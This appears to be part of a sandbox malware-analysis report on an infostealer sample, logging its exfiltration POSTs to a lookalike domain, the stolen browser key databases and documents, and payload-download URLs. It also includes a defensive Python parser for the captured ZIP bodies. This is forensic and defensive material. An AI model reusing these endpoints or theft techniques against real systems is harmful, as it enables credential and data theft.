3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 67 22 3a 5b 22 4d 69 63 72 6f 73 6f 66 74 20 42 61 73 69 63 20 44 69 73 70 6c 61 79 20 41 64 61 70 74 65 72 22 5d 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 ff 07 87 57 37 01 00 00 37 01 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 7d 01 00 00 00 00 Data Ascii: PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display 
Adapter"]}PK\d!RW77(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV}
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 139949Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 ca 34 d2 61 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 05 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 197293Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 70 c7 0d af 00 00 03 00 00 00 03 00 0f 00 00 00 62 2f 63 39 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 09 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 6a d0 05 00 00 00 08 07 d8 00 00 00 00 57 07 fb 07 f6 07 f1 07 ec 07 e7 07 e2 07 dd 07 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524954Content-Type: application/octet-streamData Raw (first bytes of the captured body; the rest of the fragment shown in the report is 0x00 padding): 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa ... Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@  .jz<{{{a{zz<z Decoded: stored (method 0) ZIP; entry b/g1/0/key3.db is 0 bytes, entry b/g1/0/key4.db is 294912 bytes and begins with a SQLite header whose page size (32768) times page count (9) equals the declared entry size. key3.db/key4.db are the NSS key databases that Firefox-family browsers use to hold the key protecting saved logins; the 524954-byte body is truncated in the report.
Source: global traffic HTTP traffic detected: POST /Up/g HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 14530Content-Type: application/octet-streamData Raw (first bytes of the captured body): 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 61 52 b7 be 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 73 f2 4d 06 02 04 00 00 02 04 00 00 33 00 00 00 67 2f 55 73 65 72 73 2f 61 6c 66 6f 6e 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 53 51 52 4b 48 4e 42 4e 59 4e 2f 53 51 52 4b 48 4e 42 4e 59 4e 2e 64 6f 63 78 53 51 52 4b 48 4e 42 4e 59 4e 45 54 44 43 49 4c 57 49 4b 4c 4e 52 59 48 4a 5a 55 50 43 59 56 54 4a 4a 4b 41 42 59 59 4e 56 45 4a 5a ... [remainder of the 1026-byte document body is uppercase ASCII letters; truncated in the report] Data Ascii: PK\d!RaR00(f1575b64-8492-4e8b-b102-4d26e8c70371.txt1746857126149e146be9-c76a-4720-bcdb-53011b87bd06PK\d!RsM3g/Users/alfons/Documents/SQRKHNBNYN/SQRKHNBNYN.docxSQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZ... Decoded: stored (method 0) ZIP; entry f1575b64-8492-4e8b-b102-4d26e8c70371.txt (48 bytes) carries the same identifier string as the "l" field of the JSON beacon posted to /Up, followed by entry g/Users/alfons/Documents/SQRKHNBNYN/SQRKHNBNYN.docx (1026 bytes), a document taken from a user profile's Documents folder whose body is uppercase ASCII letters. The entry-name prefixes (b/, g/) match the POST path suffixes /Up/b and /Up/g.
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown TCP traffic detected without corresponding DNS query: 188.114.96.3 (this row appears 50 times in the report, one per connection)
Source: global traffic HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close
Source: global traffic DNS traffic detected: DNS query: c.pki.goog
Source: unknown HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
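The three POST bodies above (/Up, /Up/b, /Up/g) share one container: an uncompressed ZIP streamed as application/octet-stream, whose entry names say what was taken (a beacon .txt, the NSS key3.db/key4.db pair, a grabbed .docx). The Python below is an added example written for this page, not code from the report, from Joe Sandbox or from the stealer: it walks ZIP local file headers so that a PCAP fragment cut mid-body still yields the file list and declared sizes, pulls the JSON beacon out of the .txt entry, and cross-checks a SQLite payload's own header against the declared ZIP size. The /Up sample is the report's 291-byte Data Raw reassembled byte for byte; the /Up/b sample is the first 120 bytes of the report's capture plus a constructed zero tail standing in for the truncated remainder. The names ZipEntry, walk_local_headers, declared_entry_count, sqlite_declared_size and summarize are mine.

```python
"""Added example: dissect the stored-ZIP exfil bodies seen in the POST /Up* requests."""
import json
import struct
import zlib
from dataclasses import dataclass
from typing import Optional

LOCAL_SIG = b"PK\x03\x04"   # local file header
EOCD_SIG = b"PK\x05\x06"    # end of central directory

# POST /Up body, 291 bytes, reassembled byte for byte from the report's Data Raw.
EXFIL_UP = (
    bytes.fromhex("50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00")
    + b"f1575b64-8492-4e8b-b102-4d26e8c70371.txt"
    + b'{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}'
    + bytes.fromhex("50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00")
    + b"\x00" * 16
    + b"f1575b64-8492-4e8b-b102-4d26e8c70371.txt"
    + bytes.fromhex("50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00")
)

# First 120 bytes of the POST /Up/b body as captured (two local headers plus the
# start of a SQLite file), followed by a CONSTRUCTED zero tail that stands in for
# the truncated remainder of the 524954-byte upload.
EXFIL_UP_B_HEAD = (
    bytes.fromhex("50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00")
    + b"b/g1/0/key3.db"
    + bytes.fromhex("50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00")
    + b"b/g1/0/key4.db"
    + b"SQLite format 3\x00"
    + bytes.fromhex("80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09")
    + b"\x00" * 64
)


@dataclass
class ZipEntry:
    name: str
    method: int
    declared_size: int
    data: bytes
    truncated: bool
    crc_ok: Optional[bool]   # None when the body is incomplete or not a plain stored entry


def walk_local_headers(blob: bytes) -> list:
    """Walk consecutive local file headers. Unlike zipfile, this needs no central
    directory, so a capture cut mid-body still yields names and declared sizes."""
    entries, off = [], 0
    while off + 30 <= len(blob) and blob[off:off + 4] == LOCAL_SIG:
        (_ver, flags, method, _mtime, _mdate, crc, csize, _usize,
         nlen, xlen) = struct.unpack_from("<HHHHHIIIHH", blob, off + 4)
        name = blob[off + 30:off + 30 + nlen].decode("utf-8", "replace")
        data_start = off + 30 + nlen + xlen
        data = blob[data_start:data_start + csize]
        truncated = len(data) < csize
        # A CRC check only means something for a complete, stored entry without a data descriptor.
        crc_ok = None
        if not truncated and method == 0 and not (flags & 0x08):
            crc_ok = (zlib.crc32(data) & 0xFFFFFFFF) == crc
        entries.append(ZipEntry(name, method, csize, data, truncated, crc_ok))
        if truncated:
            break
        off = data_start + csize
    return entries


def declared_entry_count(blob: bytes) -> Optional[int]:
    """Total entry count from the EOCD record, or None when the capture lacks one."""
    pos = blob.rfind(EOCD_SIG)
    if pos < 0 or pos + 22 > len(blob):
        return None
    return struct.unpack_from("<H", blob, pos + 10)[0]


def sqlite_declared_size(data: bytes) -> Optional[int]:
    """page_size * page_count from a SQLite header (big-endian fields at offsets 16 and 28)."""
    if len(data) < 32 or not data.startswith(b"SQLite format 3\x00"):
        return None
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:          # the value 1 encodes a 65536-byte page
        page_size = 65536
    page_count = struct.unpack_from(">I", data, 28)[0]
    return page_size * page_count


def summarize(blob: bytes) -> dict:
    """File list, declared vs. walked entry counts, and the JSON beacon if a .txt entry holds one."""
    entries = walk_local_headers(blob)
    beacon = None
    for e in entries:
        if e.name.endswith(".txt") and not e.truncated:
            try:
                beacon = json.loads(e.data)
            except ValueError:
                pass
    return {
        "declared_entries": declared_entry_count(blob),
        "walked_entries": len(entries),
        "files": [(e.name, e.declared_size, e.truncated) for e in entries],
        "beacon": beacon,
    }


if __name__ == "__main__":
    for label, body in (("/Up", EXFIL_UP), ("/Up/b (truncated)", EXFIL_UP_B_HEAD)):
        print(label, summarize(body))
```

On the /Up body the walker and the end-of-central-directory record agree on one entry and the beacon decodes to the "l", "bt" and "hi" fields shown in the report's Data Ascii. On the /Up/b fragment there is no EOCD, key3.db is an empty entry, and key4.db is reported as truncated, yet the SQLite header inside it still lets you confirm that the 294912-byte size in the ZIP header is genuine rather than padding. Feed the same functions the reassembled TCP stream from a PCAP to inventory what left the host.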
Source: Set-up.exe String found in binary or memory: http://169.254.169.254/latest/meta-data/iam/security-credentials/Retrieving
Source: Set-up.exe String found in binary or memory: http://XXXXXXwinscp.net/
Source: Set-up.exe String found in binary or memory: http://XXXXwinscp.net/forum/
Source: Set-up.exe String found in binary or memory: http://acs.amazonaws.com/groups/global/AllUsers
Source: Set-up.exe String found in binary or memory: http://acs.amazonaws.com/groups/global/AuthenticatedUsers
Source: Set-up.exe String found in binary or memory: http://acs.amazonaws.com/groups/s3/LogDelivery
Source: Set-up.exe String found in binary or memory: http://apache.org/dav/props/
Source: Set-up.exe String found in binary or memory: http://apache.org/dav/props/T
Source: Set-up.exe String found in binary or memory: http://apache.org/dav/propset/fs/1
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://h1.coldwalk.top/amshm.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://h1.coldwalk.top/sh.ext.exe.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://h1.coldwalk.top/shark.bin
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Set-up.exe String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/proxy-auth
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/proxy-authProxy-AuthorizationProxy-AuthenticateProxy-Authentication-Inf
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/server-auth
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/server-authAuthorizationWWW-AuthenticateAuthentication-InfoCould
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/server-authhttp://webdav.org/neon/hooks/proxy-authhttp://webdav.org/neo
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/webdav-locking
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockingHas
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockingLocked
Source: Set-up.exe String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockinglock:
Source: Set-up.exe String found in binary or memory: http://winscp.net/schema/session/1.0
Source: Set-up.exe String found in binary or memory: http://www.borland.com/namespaces/Types
Source: Set-up.exe String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-req
Source: Set-up.exe String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-reqWWW-AuthenticatePassport1.4Passport1.4http://www.w
Source: Set-up.exe String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirect
Source: Set-up.exe String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirecthttp://www.webdav.org/neon/hooks/http-redirectAborted
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
